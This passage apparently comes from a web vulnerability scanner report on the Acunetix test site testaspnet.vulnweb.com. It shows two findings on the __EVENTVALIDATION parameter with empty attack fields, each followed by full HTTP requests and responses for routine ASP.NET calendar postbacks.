ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1109 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,109 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8464&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgBAQJAMHdsIZGRk0yf7m2NpFQzCRiWuRT0k2WH7Gk4%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwL1rJarBALRp67yDgLQp%2BbjBwLcy%2BvqAgLcy%2BvqAgLcy9%2FTDwLcy9%2FTDwLcy%2FP2CALcy%2FP2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK%2BaMFAor5owUCivnX2QkCivnX2QkCivnL%2FAICivnL%2FAICivn%2FkwoCivn%2FkwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O%2F1QMCv5O%2F1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJkTOP0NAHuPUDKt%2F7fqVnzAU9ohM%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:04:39 GMT Content-Length: 12504
Response Body - size: 12,504 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgBAQJAMHdsIZGRk0yf7m2NpFQzCRiWuRT0k2WH7Gk4=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwL1rJarBALRp67yDgLQp+bjBwLcy+vqAgLcy+vqAgLcy9/TDwLcy9/TDwLcy/P2CALcy/P2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK+aMFAor5owUCivnX2QkCivnX2QkCivnL/AICivnL/AICivn/kwoCivn/kwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O/1QMCv5O/1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJkTOP0NAHuPUDKt/7fqVnzAU9ohM=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">March 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:White" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8471')" style="color:Black" title="March 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8472')" style="color:Black" title="March 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8473')" style="color:Black" title="March 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8474')" style="color:Black" title="March 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8475')" style="color:Black" title="March 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8476')" style="color:Black" title="March 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8477')" style="color:Black" title="March 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8478')" style="color:Black" title="March 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8479')" style="color:Black" title="March 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8480')" style="color:Black" title="March 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8481')" style="color:Black" title="March 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8482')" style="color:Black" title="March 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8483')" style="color:Black" title="March 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8484')" style="color:Black" title="March 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1141 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,141 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8446&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgDA0JTnDtsIZGRkh%2BOXDuM9d%2FKb%2BZQVVbXY%2BJvc4B0%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwL23KX8DALQp5LlBALTp%2BrACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna%2F1AgLmna%2F1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ%2FmBQLmnZ%2FmBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY%2FcDALmnY%2FcDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE%2FAvukoT8C%2B6TV0wkC%2B6TV0wkC%2B6TJ9gIC%2B6TJ9gIC%2B6T9jQoC%2B6T9jQoC%2B6SRoAMC%2B6SRoAMC%2B6SFxwwC%2B6SFxwwC%2B6T5rAkC%2B6T5rAkC%2B6TtwwIC%2B6TtwwIC3Mv%2F6AUC3Mv%2F6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7%2BQ8C3Mu7%2BQ8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6%2BoCAtzL6%2BoCAtzL39MPAtzL39MPAtzL8%2FYIAtzL8%2FYIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBeYxoNcyGleBTlFDc8vFarXONlqy
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:30:45 GMT Content-Length: 12583
Response Body - size: 12,583 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgDA0JTnDtsIZGRkh+OXDuM9d/Kb+ZQVVbXY+Jvc4B0=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwL23KX8DALQp5LlBALTp+rACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna/1AgLmna/1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ/mBQLmnZ/mBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY/cDALmnY/cDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE/AvukoT8C+6TV0wkC+6TV0wkC+6TJ9gIC+6TJ9gIC+6T9jQoC+6T9jQoC+6SRoAMC+6SRoAMC+6SFxwwC+6SFxwwC+6T5rAkC+6T5rAkC+6TtwwIC+6TtwwIC3Mv/6AUC3Mv/6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7+Q8C3Mu7+Q8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6+oCAtzL6+oCAtzL39MPAtzL39MPAtzL8/YIAtzL8/YIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBeYxoNcyGleBTlFDc8vFarXONlqy" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">February 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8436')" style="color:Black" title="February 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8437')" style="color:Black" title="February 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8438')" style="color:Black" title="February 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8439')" style="color:Black" title="February 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8440')" style="color:Black" title="February 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8441')" style="color:Black" title="February 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8442')" style="color:Black" title="February 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8443')" style="color:Black" title="February 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8444')" style="color:Black" title="February 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8445')" style="color:Black" title="February 14">14</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8446')" style="color:White" title="February 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8447')" style="color:Black" title="February 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8448')" style="color:Black" title="February 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8449')" style="color:Black" title="February 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8450')" style="color:Black" title="February 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8451')" style="color:Black" title="February 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8452')" style="color:Black" title="February 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8453')" style="color:Black" title="February 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8454')" style="color:Black" title="February 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8455')" style="color:Black" title="February 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8456')" style="color:Black" title="February 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are 